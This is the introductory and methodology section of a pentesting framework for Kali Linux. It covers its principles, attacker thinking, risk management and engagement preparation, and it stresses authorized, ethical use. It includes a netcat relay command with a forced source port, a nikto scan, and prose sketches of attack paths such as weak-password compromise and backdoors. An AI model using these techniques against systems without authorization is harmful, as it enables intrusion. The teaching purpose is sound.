The Purple Files - A Pentesting Framework - 1Q23 © Copyright 2023 William Ben Bellamy Jr. wbbellamy@gmail.com This information is exclusively for my own use and those whom I authorize. Any violation will be punished to the full extent of my imagination.
In this section you will become familiar with the different aspects of this page, how best to navigate it, and the core technologies that require some degree of skill in order to take advantage of the information and capabilities provided by The Purple Files.
This section relates to all subsequent sections by providing the background information necessary to best understand and apply the material presented here.
Note that while this project is Open Source, I am currently the sole developer. Suggestions and corrections are very welcome, but due to time constraints and directional objectives no additional coding support is being accepted at this time.
Be sure to check The Purple Files for updates at
Legend
♦ Close an external page.
♦ Pay attention to the point being made.
♦ Additional, more detailed, information.
Each of the main and sub titles on this page will turn green when you mouse over them, and back to white when the mouse moves off. Clicking a title toggles expanding or collapsing of that topic. Any other title that is already open will be closed when a title is clicked open.
Example commands. Examples are displayed as shown below. A single click anywhere on a command will copy the complete command example to the clipboard so that it can be pasted into a terminal window for execution, into your notes, or anywhere else you can paste text.
Links to external pages are displayed as shown below.
List of files comprising The Purple Files
ThePurpleFilesOverview.html
workspace/
documents/
ThePurpleFiles.html
07-20.pdf
Documenting.your.work.html
HackerThink.html
Linux.html
MAC.html
Methodology.html
Password.Cracking.html
PasswordCracking.html
Resources.html
Rules.of.Engagement.html
TakingNotes.html
Template.Pentest.Report.html
UsingMetasploit.html
netcat.html
nmap.html
unpacking.html
In reality, pentesting occurs in two ways: first, in agreement with the target system owner; second, ad hoc. This framework is intended for the first, where you are providing a service for a client who authorizes you to perform the tasks you have both agreed on, in the way you both have agreed. This framework, though not intended for it, can also be used for ad hoc pentests. And while possible, that is not recommended or condoned. Each technique, idea, example, or any other piece of information contained in this framework is explicitly intended to be used legally, ethically, and in good faith. This includes when this material is used simply for educational purposes.
One development goal was to include as much actual information as possible in an accessible format. For example, I did not want to simply list URLs to Internet-based resources. Those resources can vanish, taking both information and code with them. So in many cases I have collected that material and included it in The Purple Files so that the code is available for the tools I offer suggestions about.
The Purple Files does not try to compete with any other tool or framework. It also does not attempt to be the most sophisticated. But it is intended to familiarize you with a process, associated tools, important concepts, and the technology you use and work within when performing a pentest. With this background and skill-set you will be much better positioned to move into much more complicated situations and deal with much more sophisticated types of risk.
The Purple Files is an HTML based framework that provides both an introduction to pentesting along with an environment from which to perform pentesting.
It is assumed that you are running The Purple Files on a Kali Linux system. Actually, any mainstream Linux distribution should do as long as you have the required software installed. See the Tools Referred To in The Purple Files section for details. By default, The Purple Files is not included with Kali or any Linux distribution, so it has to be "installed". There is really no "install" process, since The Purple Files is a self-contained webpage-based "application". All you need to do from within Kali Linux is make The Purple Files directory branch accessible by copying it to a local hard drive, burning it to a CD or DVD, or having it available on a removable USB drive. You then simply open the ThePurpleFiles/ThePurpleFiles.html page in the Firefox browser within Kali Linux and you are ready to start using it.
Tools come and go. Techniques come and go. OSs and distributions come and go. That apparent lack of stability is at first unnerving, but it is actually healthy, and more importantly unavoidable. Change, growth, and regression simply are the way of things. But principles endure. They may be more relevant in one era than another, more obvious at different times and in different situations, but they last long enough to be considered, for our purposes, enduring.
Consequently, The Purple Files often focuses on purposes while devoting more screen space to commands, protocols, methodology, and examples. But it is with a foundation of principles that you can seamlessly glide from one techno-nugget to another, to a replacement, and to a truly new thing.
The Purple Files does not try to automate very often, but instead focuses on the processes that are going on, their rationale, and how all of the different tasks fit together into a cohesive, efficient, and effective process. It makes you deal with the details rather than menus and shortcuts. This is analogous to learning a word processor as opposed to learning to write. It is one thing to learn to use a word processing tool, and another to learn how to write. If you learn only the tool, that becomes the only environment you are able to work in. If, however, you learn to write, you can write with any tool: word processor, pen or pencil, chalkboard...
Because of this, there is no consideration given to certifications, and no guarantee that a given tool or example cannot be improved, replaced, eliminated, or simply left in place. The "practical" material in The Purple Files is transient. But the principles continue as a framework on which to place, expand, improve, replace, add, and remove.
The goals of pentesting are different from those of malicious intrusion.
These steps flow from one to the next and often overlap. In fact, you can jump from any step to any other at times. But the point is that this methodology helps keep you on track and keeps things from falling through the cracks.
One of the guiding principles of The Purple Files is to focus on framework, process, and goals. These are foundational to your efforts to improve and maintain a good security stance. Tools come and go, are useful or not, and evolve or stagnate. Tools are the tinker toys that can be fit together to realize your vision. Most often you do not use them all; some are cool but not helpful in the long run. And some are used over and over. When a better (and be sure you clearly define what "better" means) tool comes along, you replace the old one and redo your procedures to fit it into place. But the place you fit it into (the methodology, which is the articulation and cohesive arranging of principles) seldom changes.
What does The Purple Files provide? Using a web interface (no web server required; in fact, no Internet connection required either) The Purple Files provides a checklist that steps through a pentesting methodology, giving examples of the tools and techniques that are helpful in addressing each step of the methodology. Information is included throughout the process describing each step, each tool, and the goal at that point. Detailed information is also provided for many of the concepts and principles that apply at each step.
Who is The Purple Files intended for?
♦ Hobbyists. People who are interested in learning more about and exploring pentesting, and in seeing how they can use these principles and tools to analyze and better secure their own systems, and those of family and friends.
♦ Students. If you are studying InfoSec, or wondering if it might be for you, you can use The Purple Files to explore the possibilities. While the tools and examples are useful, the information spread throughout the system will give you several levels of explanation and description that will help reveal what pentesting is about and how its many steps and tools work together to better secure a system for use in the real world.
♦ Practitioners. Those who are working in information technology or InfoSec and want to begin to build security into the systems they work with, or to use The Purple Files as the foundation of their existing procedures.
The Purple Files is not so much a tool as it is a framework. While there are many examples of the syntax for running many tools that are used in pentesting, the real focus of The Purple Files is to provide a framework that functions as a checklist, a reference, and a textbook explaining the process (methodology) in detail. Included are scripts that help automate portions of the process.
The majority of material in The Purple Files assumes that you are running Kali Linux in some way: as the only OS, as a VM inside another host OS, booted from removable media, and so on. Linux is assumed to be the primary OS you are working in, and Kali is the distribution. Windows, however, also has a large number of very useful tools for pentesting that are not easily available on Linux. For that reason, I am including examples of the more useful tools that are most practically run from Windows. I have not included examples of tools that are available for both Linux and Windows, on the assumption that of the two, Linux is the preferable platform for this type of work.
Unlike many of the tools available, The Purple Files does not actually launch any of the programs it covers. Instead, every tool is manually run by you.
The reason for this is that there is powerful value in being familiar with the details of the programs commonly used in pentesting, and in the underlying concepts, protocols, and behaviors of systems.
Automation
There are many products available that attempt to automate the pentesting process. They make it seem like you "just need to press a button" to deliver a report.
There is a place for automation in pentesting, but only as a tool to reduce human error and sift through the large amount of information a pentest produces. The selection of tools, their combinations, when to use them, how specifically to use them, and finally how to determine what their results mean must be deliberate choices made by the person performing the pentest.
Pentesting has such potential for disrupting a system or network that you want a person operating the process, rather than the logic of a program that does not take into consideration the uniqueness, complexity, and context of the systems being reviewed.
After all, maliciously attacking a computer system is a unique series of steps, trials and errors, assumptions, and extrapolations each time it is done. Malicious attackers often do automate portions of the process of identifying potential targets and weaknesses, but at its core, pentesting is a person imaginatively, insightfully, and creatively reviewing the security posture of a system.
The Purple Files is intended to be used in the Kali Linux distribution. Kali provides a stable and feature rich environment in which to use The Purple Files. This minimizes the time and effort necessary to build a pentesting platform. In fact, Kali contains ready to use tools for many InfoSec practices and not just pentesting.
The Purple Files does not address how to install or configure Kali - that is left to you and your situation.
Installing The Purple Files simply involves copying The Purple Files directory structure to the root of your home directory and opening the main HTML page in Firefox. In fact, you could even copy The Purple Files to a USB drive and use it from there.
Below are some of the topics I will be adding to The Purple Files as time permits.
♦ More on Password cracking, both online and offline
♦ Wifi scanning and pentesting
♦ More on Linux and its more useful tools and tricks
♦ Additional tools in Kali Linux
♦ Scripts to help automate portions of the methodology
♦ More online references
Before we get into the specifics of pentesting, technology, tools, commands, and so on, I want to take a little space here to sort of cut to the chase. To review the ground rules. To introduce the things I think matter.
Remember, every day you work to learn things that are new to you, remain up-to-date on evolving issues, and synthesize all of it into a landscape you can travel confidently and effectively. But during each of those days there are hundreds of thousands of people working just as hard to develop, discover, or integrate the existing into the truly new. They will always be ahead of you. You will never keep up.
But that is OK, and again, it simply is the way it is. The best response, until a better response comes along, is to clearly articulate to yourself the areas you choose to focus on: the topics that matter to you, that will help you pursue your goals (also articulated), and to ignore the rest, which would only distract you. For the purposes of The Purple Files, pentesting and its associated topics/technologies are the topics to pursue.
The following are the principles I am referring to. They are very InfoSec oriented, though you will find unique lists of principles for every area of interest.
♦ New tools and techniques are constantly being released. Operating systems and Linux distributions evolve and mature, and existing technologies are constantly being combined to create new and hybrid technologies that can each be used in ways not intended by their developers or users. It can be mind numbing. Still, applications are developed that hope to address most if not all of the security issues that the current way technology is developed produces. "This app is all you need!" "That tool will take care of all your needs and problems!" The solution to creating and maintaining a strong security stance is always a new product, which of course comes with endless support and updates. Marketing takes the lead rather than a practical evaluation of the best solutions. And the key truth is never recognized: that it takes trained, skilled, experienced people with an aptitude for information security to select the tools and approaches to securing a system, and to select or develop the tools necessary to accomplish it. OK, maybe this is more of a rant than a principle...
♦ There is a principle in many martial arts, which appears to come from Taoist philosophy, that says, in effect: rather than build a large collection of tools, build expertise in just a few tools.
The more tools you have, the more they will overlap in function and use. The more tools you have, the more you need to know about specific syntax, interpreting results, and behavior. The alternative is to master fewer tools, including how to use them in combination with other tools. Of the 100 things we need a tool for, only 20 will occur frequently while 80 pop up once in a while. So, put your efforts into the few tools that address the frequent issues, while being aware of or possibly familiar with the other 80.
This "being aware of" is something you need to do regardless. A new tool may be right for replacing an older tool, or may be the right tool for a problem that is moving into that top 20.
And let's face it, turning to a tool that you are not that familiar with and having to quickly review it, its syntax, its input and output, and what exactly you can do with it - all of this together is one of the core skills a pentester needs to be very skilled and practiced in. It will always be the case that new tools will emerge, and new conditions will develop for which new tools are required, making it mandatory that you develop the ability to pull up a program you may never have seen before and quickly determine its usefulness and how to use it.
So have a toolbox containing a relatively small number of tools you can bring out and get right to work with. But also have another, larger toolbox out in the truck that holds the tools you don't often need, and may need to step back and remember or figure out how to use as the case requires.
An important point here is that there is no one or two tools that will do it all for you.
Be sure to add your own to this list. With every new set of eyes, new things can be seen.
♦ Tech alone will solve security's problems
There is a constant flow of new software and hardware intended to address weak security. Vulnerabilities are patched, intrusion monitors are made more sensitive and insightful, and other mostly defensive options are marketed. Even new languages have been created that do not produce so many potential vulnerabilities.
Everywhere security components can be created or improved, for a price, they are.
The future of InfoSec is painted as bright and optimistic. And that is good. We need to be optimistic, but I think we would be even better off if we also included a realistic dose in our outlook.
Regardless of how strong our IT hardware and software might be, it is used, managed, and maintained by people.
The people-part of IT has been getting worse due to fewer opportunities for ongoing education and the growing, unmet demand for IT security staff.
And even if the demand for IT security staff is met, people will remain the source of many major vulnerabilities.
♦ Default credentials
♦ Weak passwords
♦ Outdated software
♦ Security updates not applied
♦ Vulnerable "test" systems
♦ Security exceptions due to upper management demand or convenience
The point is that however perfect a tool you put into use, it will be people using it. And even if your network and all of its assets and components are as well secured as possible, there will be other networks you interact with that are not as well secured.
The more sophisticated a piece of software is, the more prone to misuse, abuse, and manipulation it is.
And this only considers non-malicious insiders. What about insiders with malicious intent?
When we perform a pentest, it may be focused on digital systems, but what we are really reviewing is the work of the people who selected, installed, configured, managed, and operated them. We are reviewing the work of others, not the integrity of digital components.
Better and more powerful tools will enter the marketplace, emergent threats and risks will continue, but people version 1.0 will continue to be the architects, managers and users of our digital systems.
So what are we to do?
Educate and Inform
Review and Analyze
Learn and Imagine
As long as people use technology, some will abuse it, and use it maliciously. To counter this, other people must use technology to manage that risk.
♦ Internal is External
We tend to think that because "all of the bad folks" are out there on the Internet, that is where the risk comes from. And there are a small number of people, all of whom we trust, inside our systems. So the majority of the risk must be external.
However, this does not take into account the malicious insider, disgruntled employees, vendors who have an internal presence, or friends and relatives that employees bring into the network.
To confuse things further, an external attacker will often gain an internal foothold from which to work. So you have external attackers internally. The whole external vs. internal way of thinking tends to obscure the actual locations from which we can be attacked, along with the attack vectors we need to be aware of and guard against.
♦ Critical Systems
Organizations classify their systems and resources based on assumptions that are not shared by attackers.
"Our XYZ site gets the most hits, so we have to secure it." "That host does not accept any Internet based connections, so it is safe." "Those files are password protected, so we do not need to protect them as if they were unencrypted."
There are several such misconceptions about what attackers are actually after that began in the media and have been incorporated into organizational culture.
SSNs, passwords, emails... These are the types of digital assets most people assume an attacker is interested in. And sure, these obvious types of material can be the targets of attack. But there are other digital assets that are the goal of intrusion. It is important to understand that any type of material or resource is an attractive target to someone. We are often the worst judges of the value of the material and resources we have.
All systems must be considered critical. A given host may not house what most would consider important material, but:
♦ every host is a stepping stone to all other networks and hosts
♦ every host offers processing horsepower that can be used however an attacker wishes
♦ every host offers disk space that can store anything an intruder decides to store
♦ every host can be used to provide anonymous or covert communications
♦ every host can be used as a distraction from the real attack
♦ every host can be used as a proxy to obscure identity, location, and so on...
Another way to state this principle is that "you often do not know what an attacker wants from you."
Organizations are quick to protect what is important to them, and that makes sense. But they then fail to protect resources that are perceived as less valuable, on the assumption they are of less value to attackers also.
For example, we provide less protection for a print server than a database server. When in fact, an attacker might see a printer as a great platform from which to further an internal attack. Not to mention that printers can be a source of information in the form of SMTP services, user names, previously printed or faxed documents, and so on. To make matters worse, printers often run a very cut-down version of Linux with much of the security functionality removed. And printer firmware is seldom updated, so vulnerabilities that were repaired elsewhere years ago may still exist on printers.
However, an attacker may be after processing horsepower rather than our data. In that case, the print server is a better target since its CPU sits idle most of the time, and high CPU utilization is less likely to be noticed on a print server than a database server.
Read the "Attacker's Motivations (Doc)" paper, listed on the TOC page, for a more in-depth discussion on this topic.
♦ Research. Finding one or more authoritative and adequate answers to a specific question.
I have been amazed for years at how often people ask me questions. Sure, there have been lots of simple, quick questions that I was likely to know off the top of my head, where looking elsewhere would take significantly more time and energy - that is no problem. In fact, no question is a problem. Easy questions, hard questions, complex questions, dumb questions (I have not seen any of those yet...), all are legitimate. But what amazes me is that it is not more natural for people to research and figure it out for themselves.
Throughout The Purple Files you are likely to have questions. The questions can be specific, e.g. "what is the parameter for more verbosity?". They can also be general, such as "How does RAID work?" or "What are the TCP flags used for?" In either case, those types of questions should pop up throughout The Purple Files, and in every other instance of "doing tech" you run into. While reading an article you come across a term that is unfamiliar or that you have only a very basic understanding of, and you want to know more so you can better understand what you are reading. You are daydreaming about some problem and wonder if there is an xyz tool or technique that would do this or that and work to solve that problem. Or when you see something that looks out of place, you wonder if it might be an indicator of something bad, or nothing at all.
When these, or a thousand other ways to describe the need or desire for more information, occur, you need to be able to rely on strong research skills. As I said, these questions will pop up throughout The Purple Files and everywhere else, and they are opportunities to practice the critical skill of research.
So, how do you go about doing that research thing?
Google (duh!). Start with search engines including Google, Bing, Yahoo, and so on. These general purpose indexes are great for at least getting started. But, there is an art to this type of searching.
Focusing on Google, you first want to determine what unique words, phrases, numbers, and so on are associated with potential answer-bearing pages.
Suppose you are given an error number for a specific program. You would want to search for that program name, its version, the word "error" and the error number. Remember you are looking for information that someone else has written while discussing that specific error. So you want to include words that not only identify that specific error and the environment in which it occurred, but also include words or phrases that that other writer would have used.
Assume you are poking around an email server and get a 552 error message. You could start by searching for "smtp error code 552". That would lead you to specific information.
Suppose you have a target that accepts traffic only from a specific TCP port number. How do you send from a specific port? Start by searching for "Sending traffic from a specific tcp port". At first you get information on programming sockets and information about ports, but nothing helpful. So let's try tweaking the query to "sending tcp from specific port". That lists a link to a page titled "How To Use Netcat to Establish and Test TCP and UDP Connections ...". Netcat, that's good - we love netcat! That page talks a lot about using netcat to send and receive as both a client and as a server.
That gets you to thinking... Netcat can send and receive, of course. And that is basically what a proxy does, but a proxy itself always sends from a static IP/port (also called a "socket"). So you search for "using netcat as a proxy". After checking several of the result pages I notice that, rather than proxy, the word "tunnel" looks more like what I am looking for. So I change the query to "netcat tunnel". That leads me to a stackexchange page that has an example.
So using that example I set up a tunnel on my local host to listen on port 8001 for inbound connections and reroute them outbound to www.google.com:80. By adding the "-p 31337" parameter, I can designate the local port that nc will use when communicating with google.com: $ sudo nc -l -p 8001 -c "nc -p 31337 www.google.com 80" - and that seems to work! In this case, if I want to be completely sure, I would repeat this example while recording the network traffic using tcpdump or wireshark, and then review the traffic to verify the sockets being used.
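A minimal sketch of that verification (assuming the tunnel above is running and your outbound interface is eth0; adjust the interface to your setup):

$ sudo tcpdump -i eth0 -nn 'tcp port 31337'    # confirm the outbound side really sources from port 31337

Then trigger the tunnel from another terminal, for example with: curl http://localhost:8001/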
In addition to this type of googling, I would also search sites that deal with this type of information, such as stackexchange.com. I would also check the books and magazines I keep at hand and use as reference material.
♦ There are many products available that promise to do all that is truly necessary with a simple click of a button. They are expansive, cover wide topic ranges, provide continual updates and support, and are typically very expensive. Their marketing is directed first at upper management. The marketers know that convincing those who can green-light projects and authorize expenditures to invest in the product is the actual goal. Providing enough technobabble, charts, testimonials, and so on will go a long way in persuading those with the checkbooks that this is the best way to accomplish their agenda. It also lets them include convincing language in reports that they had the insight, where others did not, to recognize that this investment would solve the security problem. The marketers also target technical management, who need to accomplish more, avoid disruptions, reduce or eliminate spending on software and training, and also make their reports read favorably. There is also comfort in thinking that they have resolved the rank-and-file's complaints for better tools and training.
OK, that was a bit snarky, but there is a hint of reality there.
Rather than try to do everything for a pentester - automate all tasks, gen up canned reports with plenty of graphs, and do it consistently - The Purple Files instead focuses on laying out the practical skills, insight, and procedures that an effective pentester will need. Most people can be trained to use an all-in-one application and end up with a report that gives the illusion of a comprehensive security stance. But the truth is that only an InfoSec professional can deliver on the expectation of assessing a system's security stance and then effectively communicate and advise on the ways to correct or improve each issue that has been identified: someone who is familiar with the environments they will operate in, is aware of how and why each step is performed, is familiar enough with the environments and tools to spot unusual conditions and to probe deeper and in different directions, and is imaginative, skilled, and curious enough to follow a hunch.
True, this type of super-pentester should also make use of any all-in-one tools they have access to. The point is to understand the environment the tools are analyzing, to understand the results, and to verify those results along with any other conditions they might indirectly imply.
Consider this situation. A pentester identifies a weak or default password that gives them at least read access to the filesystem. That alone is very significant, but may not be the end of the finding. Assume this is a Windows system and you are able to traverse directories into the system32 directory. There you list all of the files and directories, maybe just to get a screenshot proving you had gotten to this point. But you notice a directory named ".etc". None of your tools raise a red flag. But you are familiar with both Windows and *nix. You know that ".etc" is not a standard or common Windows directory. In fact, you probably have never seen that directory name anywhere. But you are also familiar with *nix and know that "etc" is found on most if not all *nix systems. You also know that preceding a filename or directory name with a dot makes it "hidden", and "etc" is never "hidden".
That type of familiarity would lead you to drop into that directory and investigate. Chances are you will find proof of a major intrusion that uses "hidden" directories with common names as a place to stash files and run operations from the inside.
♦ Attackers, along with most people, would rather expend less energy and time on a problem when possible. There are usually many ways to solve a given problem, and the art is in quickly finding the solution that takes the least amount of time and energy. There is a trade-off in determining the "easiest" solution, so balancing the time and effort it takes to determine the fastest and easiest solution helps determine the optimal one. In other words, you do not want to spend an hour determining which 1-minute solution is best.
You want to approximate your ROI for a given problem. And in that approximation you emphasize the ease of the solution over duration, number of steps, resources, and even the time required.
But be clear that there is no laziness involved. This is about efficiency and productivity.
Follow the path of least resistance. Consider these two scenarios, given that you want to attack an organization's database in some way.
You can choose to attack the host directly. Attempt to identify the software make and model, and then craft a buffer overflow for your attack payload which will open a backdoor through which you can run SQL queries on the actual data.
You can also choose to attack the host indirectly. First compromise the CISO's assistant through a weak password. Then, using their credentials, query the data.
Both approaches could work. But while the first involves several steps with varying degrees of difficulty, the second is less complicated and faster.
♦ You Do Not Know How What You Show Can Be Used Against You
You are a developer, and you have a name. (search discussion forums, product forums, google for the name and agency/KY/Frankfort/...)
An error message can disclose the name and version numbers of a product. (Google for the default credentials and known vulnerabilities)
The name of an actual executable might be disclosed. (google for the developer's manual and find out what parameters you can pass to the app)
♦ Knowing A Technique/Tool Exists...
The best way to become familiar with a Linux program, in this case nikto, is to first read the man page to get a feel for what the program does and what functions it provides. Then find examples such as the illustration below and reference the man page to identify the details of each parameter and the alternatives. This will give you a clear idea of what is possible. You do not need to memorize all the parameters and possibilities; you simply need to know that a thing can be done. Knowing something can be done, you can review the syntax page and man page for the details. And if you do not know whether a thing can be done, at least you will have an idea of which programs might do it and can refer to them.
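For instance, a first pass with nikto might look like this (a sketch only; the target address and output filename are illustrative, and you must be authorized to scan the host):

$ man nikto
$ nikto -h 192.0.2.10 -p 80 -o nikto.client.txt    # scan one host on port 80, saving the findings

With that working, the man page tells you what each parameter does and what the alternatives are.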
♦ Attackers Are Patient
♦ What You Think Is Impossible Is Done Daily
♦ Attackers Have Better Tools And More Knowledge
♦ If Your Computer Contains My Code, It Is No Longer Your Computer
♦ People Want To Help
Even intruders have a desire to "help" 8-)
The reason that social engineering works is not because people are stupid, naive, or foolish. It works because fundamentally people want to be helpful. They want approval, and to feel needed and important. People switch from someone else's artificial procedures of operation over to whatever it takes to meet a need, answer a question, or solve a problem. We are hardwired that way.
While the propensity to want to help is admirable, it can be taken advantage of. The only gating factor is education that takes hold. Doing an online course is cost effective, but does not translate to effective, safe behavior.
While we focus on the actual code, configurations, and other components that are in place, actual attackers include social engineering in their approach as well.
•"It Does Not Matter If My App Is Hacked"
Customers often believe that their simple application does not warrant any security considerations, usually because:
•It does not use confidential data -
In reality, confidential data is not the only thing attackers are interested in. Every application, networked or not, represents one or more vectors that offer any number of values to an attacker. In some way, every app represents a stepping stone closer to something of value to an attacker.
•Only a few people use it -
The number of people that are intended, expected, or believed to use an application has no bearing on the value that compromising that app represents to an attacker.
•We can recover quickly -
You may be able to recover quickly, but the damage is still done, whether it is recognized or not.
•No one would be interested in it -
Again, every app is another potential piece of the puzzle. Fit together enough of the pieces and you have a clear picture of your actual target.
•There have never been problems before.
•There have never been problems that were recognized or noticed.
This mindset also hides the fact that, as an app within an enterprise, its security condition reflects on every other application. If you have one house on fire in a neighborhood, the whole community is at risk of the fire spreading.
♦ Hacker Think
They say that magic is all about misdirection. Well here is a little trick that illustrates the magic in "hacker think".
I do not know how many times I have sat down at someone's desk to do something, looked under the keyboard and found a post-it note with a password written on it.
So, I take a post-it note, write a complex string on it that looks like it could be a password, and put it under my keyboard. I can just imagine someone finding that and wondering just what they could do with my account, and off they go. All the while I am wondering how much time they would waste with that misdirection.
It is silly and simple, but still an interesting example of thinking in different ways.
There have been occasions where I really did have to write a password down. In those cases I would end the password with 3 spaces and not indicate that on paper. Kind of like salting a password. Again, silly and simple, but an interesting example of "hacker think".
Notice that in both cases you take a look at how people generally behave. Then look for ways to turn that to your advantage (being more secure). And finally, you do not rely on one mechanism. Effective security is comprised of layers of controls that together defend against intrusion to the point you can accept the risk.
Likewise, hacking is often about combining layers of technique to accomplish a task.
♦ Tinker Toys
In tech, and many other areas, everything is made up of "building blocks" - atomic items that cannot be divided down into more simple things (we like to think). And it is the creative, imaginative combining of these items into structures that create systems and solutions.
In the world of tech, it seems that every few months "they" come up with something "new". A revolutionary widget that ingeniously solves problems that were otherwise intractable. The problem is that the majority of the time, that is just marketing rather than innovation.
The building blocks, the tinker toys, that are used to build tech solutions, products, and concepts are usually new combinations of well-established pieces. Everything relies on a relatively small collection of items that make up our building material.
Of course the building blocks are often improved upon and enhanced, but their fundamental structure remains the same. The little round wheel with holes around it gets a couple more holes added or is made thicker. The sticks with the slots at each end come in new colors and lengths. But they are still wheels and sticks, and they still interact the same way.
Think of a "new" tech product or item. Chances are it is simply the latest evolutionary step of a collection of well established components being combined in new ways or enhancing the structure's function.
Actual new technologies are few and far between. For example, quantum computing is a whole new collection of very odd building blocks. They bear no resemblance to existing technologies, operate entirely differently, and in some cases promise to solve problems that are intractable for conventional computers. This will require an entirely new skill set and new paradigms of how and why things are done... It will be more momentous than the transition from industrial steam power to an electric-powered society.
♦ There Is Nothing New Under The Sun
This is taken from Ecclesiastes. The idea here is that an actually new technology is seldom introduced. The majority of new stuff consists of the re-use of established technologies for new and different purposes, or a new combination of established technologies. The good news, then, is that you do not need to waste time on all of the new "revolutionary" products when you can see them as simply new twists on established technologies.
For those new things that are pertinent to what we do, or of interest for some other reason, we can review them to identify how they vary from their predecessor components, or what unique uses they offer.
Traditional pentesting is the process of identifying and leveraging an attack vector that would lead to a compromise of the targeted host. There is the assumption that, given time, a host that has been compromised can serve as a platform from which all of its components, neighboring hosts, and eventually the entire network can be compromised.
In contrast, a less-invasive review that simply identifies a system's characteristics, components, and potential security issues is a Vulnerability Scan. With a Vulnerability Scan, no intrusion need be demonstrated, instead as many vulnerabilities as possible are identified and remediated before they can be maliciously taken advantage of.
A Methodology consists of the procedures that are to be followed so that the results are consistent, and so that results are produced that are digestible and actionable for the client. The methodology used in this project leads you through the process of pentesting in a way that is organized, comprehensive, repeatable, and that leads to an accurate risk assessment of the host(s) in a given engagement. For more information, click the books icon to the right.
Pentesting has traditionally been an exercise in establishing a remote shell on the target host, escalating your privileges, and then finally creating a backdoor into the compromised system for subsequent covert activities. But pentesting has evolved, and we believe the approach laid out here is more useful, beneficial, and safe.
The goal is to identify most or all of the vulnerabilities on the target host which can, alone or in combination, constitute a risk. We then verify our findings, all the while developing a report containing the issues that were found along with information that will assist the client in addressing those issues. Any other requirements stated in the engagement agreement should also be performed. This is explained further in the Preparation section.
It is worth communicating to the client(s) that there is always a risk of disruption. The steps taken, the tools used, and how they are used are selected in such a way that the risk of disruption is minimized. However, with every host and network it is possible that the hardware, software, and/or configuration contain errors, bugs, or other mistakes that might make the otherwise safe and reasonable use of these tools disruptive. To minimize that risk, we clearly communicate to the client their responsibilities in preparing for the pentest, our responsibilities for avoiding disruption, and what to do if some type of disruption does occur.
It is critical that you record your observations and findings as they occur. Click on the book icon to the right for more information.
Not every example in The Purple Files must be used in every engagement. This page covers the majority of commands and tools likely to be employed in an engagement, but each engagement is different. Think of The Purple Files as a toolbox - most of the tools and their user manuals are included, but there is always some other tool or technique that can be helpful. Make sure that over time you customize your toolbox to contain the best tools for each job.
Use each command only if you clearly understand its purpose, why you intend to use it, what effects you can expect it to have, and what effects might indicate a problem. And never use any of the tools or examples shown here unless you are properly authorized.
Pentesting is often thought of as an effort directed entirely at a specific host for the purpose of compromising its security. Think of "capture the flag" games. In reality, the path to unauthorized access to a system or resource usually runs through two or more associated hosts.
While a pentest engagement is often focused on a single host, the pentest process should potentially include all aspects of the target, its network, and all hosts in its domain. Often, either the actual attack vector or information that leads to an intrusion can come from peer hosts. So, when pentesting a specific host, you will often perform cursory scans, probes, and queries of associated hosts.
The Purple Files is designed to focus on a single host. However, the methodology presented by The Purple Files includes specific steps that enumerate many of the adjacent hosts.
There is only limited value in reviewing a single host, even if it contains whatever is considered the client's most valuable asset. That host/asset may be the endgame for an attacker, or the point the client is most concerned about, but a realistic review must include at least cursory reviews of any host that is likely to play a part in compromising a given host or resource.
Pentesting, and security in general, are all about Risk Management (which is a topic you should spend time researching and becoming familiar with). Risk is "the potential of loss, harm, and/or disruption due to internal and external forces and/or conditions, both intentional and unintentional."
You cannot eliminate risk, but you can manage it. You manage risk by:
♦ Reducing risk
♦ Transferring risk
♦ Avoiding risk
For example, reduce risk by keeping software patches up to date. Transfer risk with insurance or sub-contracting. Avoid risk by removing unnecessary network services (FTP, Telnet, chargen, motd...).
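As a quick illustration of spotting those unnecessary services (a sketch; the output varies by system):

$ sudo ss -tlnp    # list listening TCP sockets and the processes that own them

Anything listening that you cannot justify is a candidate for removal or firewalling.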
There are many advantages that attackers have over defenders.
First, attackers are much more patient. You may have an intrusion detection system (research IDS to see where they can be placed, how they recognize malicious behavior, and the ways that they can be defeated or, better, circumvented) that is configured to block port scans. Fine, you can now sleep at night - at least until you get the midnight call that your systems have been hacked!
The goal of this section is to provide a way to customize the examples illustrated throughout The Purple Files for each engagement, to prepare your host (laptop, desktop...) for performing an engagement, and to best record your activities during an engagement.
The information covered in this section will be used throughout the remainder of the application.
Note that as discussion of each engagement begins, you should begin documenting (with lots of datetime stamps) your activities, understandings, suggestions and so on. This is a key part of preparing for dealing with problems during and after an engagement.
This is a good time to point out that some of your engagements will not be pleasant. Customers will misunderstand something, expect something not agreed to, or perceive damage or disruption to their systems when there is none.
After the fact, you will not be able to recreate the necessary information/proof that you acted properly or that you are not responsible for perceived damages. So it is critical that you record, as you go, as much information as you can that will be definitively helpful in those cases.
The types of information you want to record include:
Importantly, make sure to include a datetime stamp for each item.
All of this material (the files) should be escrowed in some way. For example, email encrypted copies to yourself. Then move them to an email folder for each engagement. This shows that a disinterested third party has had the material beginning at a specific date/time and that you did not have access to alter it without leaving glaring indications that the material has been altered. Also, if there is any question, your email provider can produce backups from when the material was sent/received to verify the material and the date and time.
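A minimal sketch of that encryption step (assuming GnuPG, which ships with most distributions; the filename is illustrative):

$ gpg -c Engagement-Title.Notes.txt    # symmetric encryption; you will be prompted for a passphrase

The resulting Engagement-Title.Notes.txt.gpg file is what you email to yourself.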
My process is to put copies of the engagement documents in a directory named workspace, along with, most importantly, a text file named something like Engagement-Title.Notes.txt.
Then, as I am doing ANYTHING, or have pertinent ideas or observations, or take any action, I make a note about it in this text file, preceding each note with a datetime stamp. I of course use a programmer's text editor like Notepad++, Sublime, or Geany. These provide shortcuts for inserting datetime stamps, and all sorts of text manipulation features that make this process much easier.
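You can also append a timestamped note from the shell itself; for example (a sketch, with an illustrative note and filename):

$ { date '+%F %T'; echo 'Started nmap scan of target subnet'; } >> Engagement-Title.Notes.txt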
There are several files/documents located in the documents/ directory that can assist during an engagement. Below is a list of those files and their purposes.
The Rules.of.Engagement.html file lists the detailed tasks that must be addressed before an engagement can begin. Open and print that page, fill it out by hand, and retain it. Click on the file icon to the right to open the Rules of Engagement page.
Notes.txt - Used to take notes during the engagement to help the operator keep track of tasks and format material to be copied into the report
Rules.of.Engagement.doc - The detailed checklist to be filled out in the preparation stage of the engagement
Template.Pentest.Report.doc - The final report template which includes the Target Profile.
Throughout the engagement and remediation stages these files are used to manage, organize and document this engagement.
Time frame:
The window for active queries and attacks: when the active tasks can start and how long the engagement will run. Passive queries can be performed at any time.
Backups:
The client will create backups of the system(s), data, applications, configurations and all else that is needed to recover from an unexpected destructive event.
Potential Disruption:
